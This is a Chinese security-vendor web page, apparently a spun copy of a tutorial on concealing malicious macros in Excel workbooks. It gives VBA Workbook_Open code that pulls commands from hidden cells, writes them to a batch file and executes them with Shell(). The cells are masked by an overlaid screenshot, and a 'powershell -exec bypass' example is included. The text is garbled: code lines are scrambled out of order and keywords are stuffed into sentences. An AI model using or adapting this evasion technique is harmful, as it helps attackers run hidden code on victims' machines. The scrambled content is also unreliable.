怎么在Excel中更好DDoS高防地躲藏恶意宏代码-墨者安全-墨者盾
DDOS防御_CC防护_高防CDN服务器_【墨者安全】—墨者盾墨者盾—你的网站贴身保镖!
QQ:800185041
高防免费接入:400-0797-119

渠道合作:156 2527 6999

主页 > CC防护 > 怎么在Excel中更好DDoS高防地躲藏恶意宏代码

怎么在Excel中更好DDoS高防地躲藏恶意宏代码

小墨安全管家 2020-10-04 15:29 CC防护 89 ℃
DDoS防御

只需将要写入文件的代码插入到工作簿中,并记下该文件所在的列和行,并更改Data&Data1变量以与你的列和行匹配(假如需要的话,添加更多的变量)。接着,将工作簿中的代码与空行的屏幕截图叠加,接着开始就能够了!

8.    Print #FileNumber, Data 

显然,更有耐心的人能够完善空列的屏幕截图,并将其覆盖在代码顶部以使其不这么引人注意。揭示从工作表中提取的代码的另一种想法是使用MsgBox:

向文件写入多行不过小菜一碟,只需要添加几行代码即可。

11. Shell(Path) 

3. 打开文档并在用户单击“启用内容”后将提取并执行的代码。

Private Sub Workbook_Open() 

接着将宏插入ThisWorkbook并更改Range()部分以与你的列匹配。所以,假如你将数据插入A列同时位于第一行,它算是Range("A1")。

3. FileNumber = FreeFile 

将代码插入所需的任何列后,只需将空列的图像插入代码上方(插入>插图>图片)。

10.    Close FileNumber 

9.    Print #FileNumber, Data2 

Private Sub Workbook_Open() 

Data = Sheet1.Range("BG1")仅查看位于BG1的行,提取该行中的所有内容并将其放在变量Data中。

5. Data2 = Sheet1.Range("BG2"

第7-9行也是动态的,它们仅打开文件并将已提取的数据写入文件。非常是第8和9行是负责将数据写入文件的行。

End Sub 

此刻你会看到,该宏正在从特定列中提取代码并使用Shell()执行该代码,但该代码显然很可疑:

Data = Sheet1.Range("BG1"

powershell.exe -exec bypass -C echo "Hello world" > C:\Users\Desktop\Conduct\Desktop\test.txt 

7. Open Path For Output As FileNumber 

你大概会咨询,为啥不简单地使用实际上不涉及工作簿的代码,以及要紧缘由是幸免网络流量。固然,你能够简单地添加宏,这些宏会将每行代码添加到一具新文件中,以幸免网络流量,然而如此做会使活动关于任何分析文档的人来讲基本上显而易见的,他们会在查看时即将看到新的代码行宏。使用这种想法,它使得对恶意文档的分析略微艰难一些,然而固然不是特别多。

将多行写入文件

如何在Excel中更好DDoS高防地隐藏恶意宏代码

第1-3行是静态的,保持原样,它们不过定义使用的变量。第4-6行是动态的。你将需要依照excel工作表将4和5中的字符串更改为代码所在的位置。将第6行更改为所需的文件路径。

使用的宏代码如下所示:

End Sub 

1. Dim Path As String 

2. Dim FileNumber As Integer 

1. 一组要覆盖在代码顶部的空列的屏幕截图,例如:

2. 从工作簿中提取代码并运行数据的宏:

4. Data = Sheet1.Range("BG1"

而且,假如我们导航到代码所在的BG1,我们不大概即将看到任何可疑的东西:然而,假如将鼠标悬停在BG1上(或者略微靠近一下并注意到未对齐的列),这么你会看到在代码上覆盖了一具图像:

Shell(Data) 

注意:仅对文档运行oledump或olevba之类的工具将返回宏。

6. Path = "test.bat" 


DDoS防御

当前位置:主页 > CC防护 > 怎么在Excel中更好DDoS高防地躲藏恶意宏代码

标签列表
DDoS防御
网站分类
X
 

QQ客服

400-0797-119